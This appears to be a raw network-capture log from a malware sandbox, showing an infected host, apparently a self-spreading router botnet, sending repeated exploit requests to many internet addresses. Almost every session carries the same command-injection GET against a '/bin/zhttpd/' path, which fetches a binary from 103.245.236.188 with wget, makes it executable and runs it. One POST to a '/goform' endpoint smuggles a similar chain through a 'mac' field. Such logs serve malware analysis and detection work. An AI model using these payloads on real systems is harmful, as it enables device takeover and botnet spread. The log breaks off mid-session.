                                    Jan 13, 2024 19:02:20.861932039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1204192.168.2.13538962.125.110.114443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.861963034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1205192.168.2.133369246.78.75.65443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.861995935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1206192.168.2.133533219.165.197.109443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.862020969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1207192.168.2.136059861.139.67.195443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.862067938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1208192.168.2.1358940195.39.4.85443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.862096071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1209192.168.2.1346518140.50.88.162443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.862111092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1210192.168.2.1350516136.82.113.80443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.862173080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1211192.168.2.134925449.144.123.83443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.862209082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1212192.168.2.1335826170.49.142.206443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.862246037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1213192.168.2.1350638166.23.184.123443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.862253904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1214192.168.2.1336778195.137.25.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.862314939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1215192.168.2.1357126138.24.177.93443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.862360954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1216192.168.2.134693082.175.5.172443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.862385035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1217192.168.2.135747651.71.21.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.862397909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1218192.168.2.133782238.191.63.130443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.862427950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1219192.168.2.1359698151.25.208.209443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.862504005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1220192.168.2.1359766107.148.191.18443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.862508059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1221192.168.2.1334934177.202.79.253443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.862540007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1222192.168.2.1352486148.60.167.173443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.862585068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1223192.168.2.1345466102.21.187.213443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.862603903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1224192.168.2.134042039.247.120.4443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.862637997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1225192.168.2.13338469.240.20.231443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.862693071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1226192.168.2.1355302102.143.83.177443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.865609884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1227192.168.2.1359562114.161.43.118443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.865629911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1228192.168.2.1350532130.9.244.139443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.865657091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1229192.168.2.135790078.221.130.169443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.865688086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1230192.168.2.1355144164.247.113.103443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.865700960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1231192.168.2.135333825.204.31.210443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.865756989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1232192.168.2.1347484156.245.209.38443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.865808010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1233192.168.2.1342930143.251.246.147443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.865854025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1234192.168.2.133422289.198.7.146443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.865874052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1235192.168.2.135458663.184.132.79443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.865926027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1236192.168.2.1338872124.208.123.152443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.865957975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1237192.168.2.134103650.7.48.51443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.865988016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1238192.168.2.1333018115.157.187.81443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.866025925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1239192.168.2.134245442.26.35.132443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:20.866055012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1240192.168.2.1351326156.238.18.798080
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.816181898 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                    Cookie: user=admin
                                    Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                    Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.188/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                    Jan 13, 2024 19:02:21.920820951 CET328INHTTP/1.1 400 Bad Request
                                    Server: cloudflare
                                    Date: Sat, 13 Jan 2024 18:02:21 GMT
                                    Content-Type: text/html
                                    Content-Length: 155
                                    Connection: close
                                    CF-RAY: -
                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1241192.168.2.133340889.64.225.244443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.882292986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1242192.168.2.1335096172.245.116.75443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.882390976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1243192.168.2.13495462.189.80.44443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.882399082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1244192.168.2.1350970114.224.8.96443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.882456064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1245192.168.2.1342478169.106.127.50443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.882483006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1246192.168.2.133388653.7.236.85443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.882543087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1247192.168.2.133594886.26.178.144443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.882575035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1248192.168.2.1356564188.136.188.248443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.882621050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1249192.168.2.1339302181.159.33.225443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.882647991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1250192.168.2.1337914199.110.54.203443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.882693052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1251192.168.2.134889625.211.230.205443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.882735968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1252192.168.2.1334146218.157.106.253443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.882788897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1253192.168.2.134143688.236.69.159443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.882822990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1254192.168.2.1349112142.57.244.39443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.882841110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1255192.168.2.1336354122.26.197.48443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.882889032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1256192.168.2.1350980129.88.70.56443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.882922888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1257192.168.2.1351346188.69.237.247443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.882961988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1258192.168.2.133300817.244.181.77443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.882994890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1259192.168.2.1343152143.138.19.59443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.883033991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1260192.168.2.13346981.159.64.190443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.883074045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1261192.168.2.134815872.19.242.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:21.883140087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1262192.168.2.1355132183.251.165.226443
                                    TimestampBytes transferredDirectionData
